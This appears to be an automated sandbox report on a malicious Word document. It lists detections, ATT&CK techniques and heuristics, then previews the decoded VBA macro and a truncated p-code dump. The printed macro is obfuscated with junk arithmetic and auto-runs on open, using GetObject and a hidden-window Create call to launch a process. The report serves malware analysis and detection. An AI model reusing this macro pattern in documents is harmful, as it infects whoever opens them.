Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes the GetObject function, a known technique for executing embedded objects or code, indicating an attempt to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Malware.Drvb-6902289-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11466 bytes |
SHA-256: b4660fcc8bb98aca4999452c0c80e7d127b710164e45be324dbe8b6b17531689
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
TXABkB.ShowWindow = 709285 - 709285
If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/fb9c4fe615a84730ab0b58b3e4e256ea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' FuncDefn (Sub wAAcAZ())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld jwQX_AQ
' Eq
' IfBlock
' Line #3:
' LitDI4 0xDC84 0x042C
' LitDI4 0x637D 0x1C10
' LitDI4 0x3545 0x18B1
' ArgsLd Round 0x0001
' Mul
' Ld wBGXc1
' Add
' Ld Q11Ux1
' ArgsL
... (truncated)